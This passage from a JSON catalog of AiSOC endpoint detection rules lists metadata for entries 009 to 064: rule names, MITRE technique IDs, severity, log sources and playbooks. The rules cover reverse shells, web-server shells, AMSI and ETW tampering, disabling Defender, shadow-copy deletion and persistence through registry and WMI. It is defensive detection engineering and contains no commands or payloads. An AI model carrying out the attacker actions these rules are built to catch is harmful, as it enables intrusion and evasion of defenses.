Run Key Write'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1547.001" ], "log_source": "edr", "playbook": "tpl-persistence", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/registry-runkey-write.yaml" }, { "id": "det-endpoint-009", "type": "detection", "name": "New Service Installed with Suspicious Binary Path", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'New Service Installed with Suspicious Binary Path'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1543.003" ], "log_source": "windows", "playbook": "tpl-persistence", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/service-install-binary-suspicious.yaml" }, { "id": "det-endpoint-010", "type": "detection", "name": "Binary Written to ADMIN$ via SMB", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'Binary Written to ADMIN$ via SMB'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1021.002" ], "log_source": "edr", "playbook": "tpl-lateral-movement", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/psexec-style-binary-write-admin-share.yaml" }, { "id": "det-endpoint-011", "type": "detection", "name": "EDR / AV Service Stopped or Unloaded", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'EDR / AV Service Stopped or Unloaded'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "critical", "category": "endpoint", "mitre_techniques": [ "T1562.001" ], "log_source": "edr", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/edr-unload-attempt.yaml" }, { "id": "det-endpoint-012", "type": "detection", "name": "Volume Shadow Copies Deleted", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'Volume Shadow Copies Deleted'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "critical", "category": "endpoint", "mitre_techniques": [ "T1490" ], "log_source": "edr", "playbook": "tpl-ransomware", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/shadow-copy-deletion.yaml" }, { "id": "det-endpoint-013", "type": "detection", "name": "Windows Event Log Cleared", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'Windows Event Log Cleared'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "critical", "category": "endpoint", "mitre_techniques": [ "T1070.001" ], "log_source": "windows", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/windows-event-log-cleared.yaml" }, { "id": "det-endpoint-014", "type": "detection", "name": "Host Firewall Disabled", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'Host Firewall Disabled'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1562.004" ], "log_source": "edr", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/firewall-disabled-host.yaml" }, { "id": "det-endpoint-015", "type": "detection", "name": "Cross-Process Remote Thread Injection", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'Cross-Process Remote Thread Injection'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1055" ], "log_source": "edr", "playbook": "tpl-malware-execution", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/process-injection-cross-process-thread.yaml" }, { "id": "det-endpoint-016", "type": "detection", "name": "AMSI Bypass via DLL or Reflective Patch", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'AMSI Bypass via DLL or Reflective Patch'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1562.001" ], "log_source": "edr", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/amsi-bypass.yaml" }, { "id": "det-endpoint-017", "type": "detection", "name": "ETW Tampering / Logging Disable", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'ETW Tampering / Logging Disable'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1562.006" ], "log_source": "edr", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/etw-tampering.yaml" }, { "id": "det-endpoint-018", "type": "detection", "name": "Hosts File Modified", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'Hosts File Modified'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1565.001" ], "log_source": "edr", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/host-files-modified.yaml" }, { "id": "det-endpoint-019", "type": "detection", "name": "DLL Loaded with Invalid or Untrusted Signature", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'DLL Loaded with Invalid or Untrusted Signature'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1574.002" ], "log_source": "edr", "playbook": "tpl-malware-execution", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/image-load-suspicious-signing.yaml" }, { "id": "det-endpoint-020", "type": "detection", "name": "DLL Loaded From Network Share", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'DLL Loaded From Network Share'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1574.002" ], "log_source": "edr", "playbook": "tpl-malware-execution", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/remote-image-load-from-share.yaml" }, { "id": "det-endpoint-021", "type": "detection", "name": "SUID/SGID Binary Created", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'SUID/SGID Binary Created'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1548.001" ], "log_source": "linux", "playbook": "tpl-privilege-escalation", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/suid-binary-creation.yaml" }, { "id": "det-endpoint-022", "type": "detection", "name": "Kernel Module Loaded from Non-Standard Path", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'Kernel Module Loaded from Non-Standard Path'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1547.006" ], "log_source": "linux", "playbook": "tpl-persistence", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/kernel-module-load-suspicious.yaml" }, { "id": "det-endpoint-023", "type": "detection", "name": "Cron Job Created Pointing to /tmp or /dev/shm", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'Cron Job Created Pointing to /tmp or /dev/shm'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1053.003" ], "log_source": "linux", "playbook": "tpl-persistence", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/cronjob-suspicious-path.yaml" }, { "id": "det-endpoint-024", "type": "detection", "name": "Shell Spawned by Web Server Process", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'Shell Spawned by Web Server Process'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "critical", "category": "endpoint", "mitre_techniques": [ "T1059.004", "T1505.003" ], "log_source": "linux", "playbook": "tpl-webshell", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/shell-from-web-server.yaml" }, { "id": "det-endpoint-025", "type": "detection", "name": "Reverse Shell Pattern from /bin/bash", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'Reverse Shell Pattern from /bin/bash'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "critical", "category": "endpoint", "mitre_techniques": [ "T1059.004" ], "log_source": "linux", "playbook": "tpl-malware-execution", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/reverse-shell-bash.yaml" }, { "id": "det-endpoint-026", "type": "detection", "name": "Unix User Added with Login Shell", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'Unix User Added with Login Shell'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1136.001" ], "log_source": "linux", "playbook": "tpl-persistence", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/user-add-suspicious.yaml" }, { "id": "det-endpoint-027", "type": "detection", "name": "SSH authorized_keys File Modified", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'SSH authorized_keys File Modified'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1098.004" ], "log_source": "linux", "playbook": "tpl-persistence", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/ssh-key-added-authorized.yaml" }, { "id": "det-endpoint-028", "type": "detection", "name": "Container Launched with --privileged Flag", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'Container Launched with --privileged Flag'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1611" ], "log_source": "linux", "playbook": "tpl-container-escape", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/container-privileged-launch.yaml" }, { "id": "det-endpoint-029", "type": "detection", "name": "Container Mounts Host Filesystem at /host", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'Container Mounts Host Filesystem at /host'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1611" ], "log_source": "kubernetes", "playbook": "tpl-container-escape", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/container-mount-host-fs.yaml" }, { "id": "det-endpoint-030", "type": "detection", "name": "kubectl exec Into Production Namespace by Non-Operator", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'kubectl exec Into Production Namespace by Non-Operator'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1609" ], "log_source": "kubernetes", "playbook": "tpl-cloud-anomaly", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/kube-exec-into-prod-pod.yaml" }, { "id": "det-endpoint-031", "type": "detection", "name": "macOS LaunchAgent or LaunchDaemon Plist Created", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'macOS LaunchAgent or LaunchDaemon Plist Created'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1543.001", "T1543.004" ], "log_source": "macos", "playbook": "tpl-persistence", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/macos-launchagent-write.yaml" }, { "id": "det-endpoint-032", "type": "detection", "name": "macOS TCC Bypass Pattern (Direct DB Write)", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'macOS TCC Bypass Pattern (Direct DB Write)'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1556.006" ], "log_source": "macos", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/macos-tcc-bypass-attempt.yaml" }, { "id": "det-endpoint-033", "type": "detection", "name": "Suspicious AppleScript Execution via osascript", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'Suspicious AppleScript Execution via osascript'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1059.002" ], "log_source": "macos", "playbook": "tpl-malware-execution", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/macos-osascript-spawn.yaml" }, { "id": "det-endpoint-034", "type": "detection", "name": "macOS Gatekeeper Disabled", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'macOS Gatekeeper Disabled'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1553.001" ], "log_source": "macos", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/macos-gatekeeper-disabled.yaml" }, { "id": "det-endpoint-035", "type": "detection", "name": "macOS Quarantine Attribute Stripped", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'macOS Quarantine Attribute Stripped'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1553.001" ], "log_source": "macos", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/macos-codesign-bypass.yaml" }, { "id": "det-endpoint-036", "type": "detection", "name": "Browser Extension Installed Outside Allowlist", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'Browser Extension Installed Outside Allowlist'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1176" ], "log_source": "edr", "playbook": "tpl-account-anomaly", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/browser-extension-installed-suspicious.yaml" }, { "id": "det-endpoint-037", "type": "detection", "name": "USB Mass-Storage Device Attached to Restricted Host", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'USB Mass-Storage Device Attached to Restricted Host'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1052.001" ], "log_source": "edr", "playbook": "tpl-data-exfil", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/usb-device-mass-storage-attached.yaml" }, { "id": "det-endpoint-038", "type": "detection", "name": "Remote Management Tool Installed Outside Allowlist", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'Remote Management Tool Installed Outside Allowlist'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1219" ], "log_source": "edr", "playbook": "tpl-malware-execution", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/rmm-tool-install.yaml" }, { "id": "det-endpoint-039", "type": "detection", "name": "Driver Signed by Microsoft Loaded with Vulnerable Hash (BYOVD)", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'Driver Signed by Microsoft Loaded with Vulnerable Hash (BYOVD)'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "critical", "category": "endpoint", "mitre_techniques": [ "T1068" ], "log_source": "edr", "playbook": "tpl-malware-execution", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/drivers-loaded-suspicious.yaml" }, { "id": "det-endpoint-040", "type": "detection", "name": "Screen-Capture Tool Use on Sensitive Workstation", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'Screen-Capture Tool Use on Sensitive Workstation'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1113" ], "log_source": "edr", "playbook": "tpl-data-exfil", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/screen-capture-tool.yaml" }, { "id": "det-endpoint-041", "type": "detection", "name": "Windows Service Created With Suspicious BinaryPath", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'Windows Service Created With Suspicious BinaryPath'. Watch the 2 documented false-positive cases before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1543.003" ], "log_source": "windows", "playbook": "tpl-persistence", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/win-service-create-suspicious-binpath.yaml" }, { "id": "det-endpoint-042", "type": "detection", "name": "Windows Service Image Path Modified", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'Windows Service Image Path Modified'. Watch the 2 documented false-positive cases before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1543.003", "T1574" ], "log_source": "windows", "playbook": "tpl-persistence", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/win-service-modify-image-path.yaml" }, { "id": "det-endpoint-043", "type": "detection", "name": "Windows svchost.exe Loaded DLL From User Path", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'Windows svchost.exe Loaded DLL From User Path'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1574.002" ], "log_source": "windows", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/win-service-svchost-loaded-suspicious-dll.yaml" }, { "id": "det-endpoint-044", "type": "detection", "name": "Scheduled Task Created From Office or Browser", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'Scheduled Task Created From Office or Browser'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1053.005" ], "log_source": "windows", "playbook": "tpl-persistence", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/win-task-create-from-untrusted-process.yaml" }, { "id": "det-endpoint-045", "type": "detection", "name": "Scheduled Task Runs Encoded PowerShell", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'Scheduled Task Runs Encoded PowerShell'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1053.005", "T1027" ], "log_source": "windows", "playbook": "tpl-execution", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/win-task-runs-encoded-powershell.yaml" }, { "id": "det-endpoint-046", "type": "detection", "name": "Registry Run Key Points To Temp Path", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'Registry Run Key Points To Temp Path'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1547.001" ], "log_source": "windows", "playbook": "tpl-persistence", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/win-runkey-write-binary-temp.yaml" }, { "id": "det-endpoint-047", "type": "detection", "name": "Registry RunOnceEx Key Modified", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'Registry RunOnceEx Key Modified'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1547.001" ], "log_source": "windows", "playbook": "tpl-persistence", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/win-runonceex-write.yaml" }, { "id": "det-endpoint-048", "type": "detection", "name": "Image File Execution Options Debugger Set", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'Image File Execution Options Debugger Set'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "critical", "category": "endpoint", "mitre_techniques": [ "T1546.012" ], "log_source": "windows", "playbook": "tpl-persistence", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/win-image-file-execution-options-debugger.yaml" }, { "id": "det-endpoint-049", "type": "detection", "name": "AppInit_DLLs Registry Value Modified", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'AppInit_DLLs Registry Value Modified'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1546.010" ], "log_source": "windows", "playbook": "tpl-persistence", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/win-appinit-dll-write.yaml" }, { "id": "det-endpoint-050", "type": "detection", "name": "Winlogon Userinit Registry Value Modified", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'Winlogon Userinit Registry Value Modified'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "critical", "category": "endpoint", "mitre_techniques": [ "T1547.004" ], "log_source": "windows", "playbook": "tpl-persistence", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/win-winlogon-userinit-modified.yaml" }, { "id": "det-endpoint-051", "type": "detection", "name": "ScreenSaver Registry Path Set To Custom Binary", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'ScreenSaver Registry Path Set To Custom Binary'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1546.002" ], "log_source": "windows", "playbook": "tpl-persistence", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/win-screensaver-registry-binary.yaml" }, { "id": "det-endpoint-052", "type": "detection", "name": "HKLM BootExecute Registry Value Modified", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'HKLM BootExecute Registry Value Modified'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "critical", "category": "endpoint", "mitre_techniques": [ "T1547" ], "log_source": "windows", "playbook": "tpl-persistence", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/win-bootexecute-modified.yaml" }, { "id": "det-endpoint-053", "type": "detection", "name": "Startup Folder Written By Non-Installer Process", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'Startup Folder Written By Non-Installer Process'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1547.001" ], "log_source": "windows", "playbook": "tpl-persistence", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/win-startup-folder-write.yaml" }, { "id": "det-endpoint-054", "type": "detection", "name": "Logon Script Registry Modified", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'Logon Script Registry Modified'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1037.001" ], "log_source": "windows", "playbook": "tpl-persistence", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/win-logon-script-registry.yaml" }, { "id": "det-endpoint-055", "type": "detection", "name": "COM Hijack Via HKCR\\CLSID\\InprocServer32 Modification", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'COM Hijack Via HKCR\\CLSID\\InprocServer32 Modification'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1546.015" ], "log_source": "windows", "playbook": "tpl-persistence", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/win-com-hijack-classes-root.yaml" }, { "id": "det-endpoint-056", "type": "detection", "name": "Permanent WMI EventFilter Created", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'Permanent WMI EventFilter Created'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1546.003" ], "log_source": "windows", "playbook": "tpl-persistence", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/win-wmi-eventfilter-create.yaml" }, { "id": "det-endpoint-057", "type": "detection", "name": "Permanent WMI EventConsumer Created", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'Permanent WMI EventConsumer Created'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1546.003" ], "log_source": "windows", "playbook": "tpl-persistence", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/win-wmi-eventconsumer-create.yaml" }, { "id": "det-endpoint-058", "type": "detection", "name": "WMI Filter-To-Consumer Binding Created", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'WMI Filter-To-Consumer Binding Created'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1546.003" ], "log_source": "windows", "playbook": "tpl-persistence", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/win-wmi-binding-create.yaml" }, { "id": "det-endpoint-059", "type": "detection", "name": "Application Compatibility Shim Database Installed", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'Application Compatibility Shim Database Installed'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1546.011" ], "log_source": "windows", "playbook": "tpl-persistence", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/win-shim-database-installed.yaml" }, { "id": "det-endpoint-060", "type": "detection", "name": "Print Monitor DLL Installed", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'Print Monitor DLL Installed'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1547.010" ], "log_source": "windows", "playbook": "tpl-persistence", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/win-print-monitor-installed.yaml" }, { "id": "det-endpoint-061", "type": "detection", "name": "Microsoft Defender Disabled Via Registry", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'Microsoft Defender Disabled Via Registry'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1562.001" ], "log_source": "windows", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/win-defender-disabled-via-registry.yaml" }, { "id": "det-endpoint-062", "type": "detection", "name": "Defender Real-Time Monitoring Disabled", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'Defender Real-Time Monitoring Disabled'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1562.001" ], "log_source": "windows", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/win-defender-realtime-monitoring-off.yaml" }, { "id": "det-endpoint-063", "type": "detection", "name": "Microsoft Defender Path Exclusion Added", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'Microsoft Defender Path Exclusion Added'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1562.001" ], "log_source": "windows", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/win-defender-exclusion-added.yaml" }, { "id": "det-endpoint-064", "type": "detection", "name": "AMSI Provider DLL Loaded From User Path", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'AMSI Provider DLL Loaded From User Path'. Watch the 1 documented 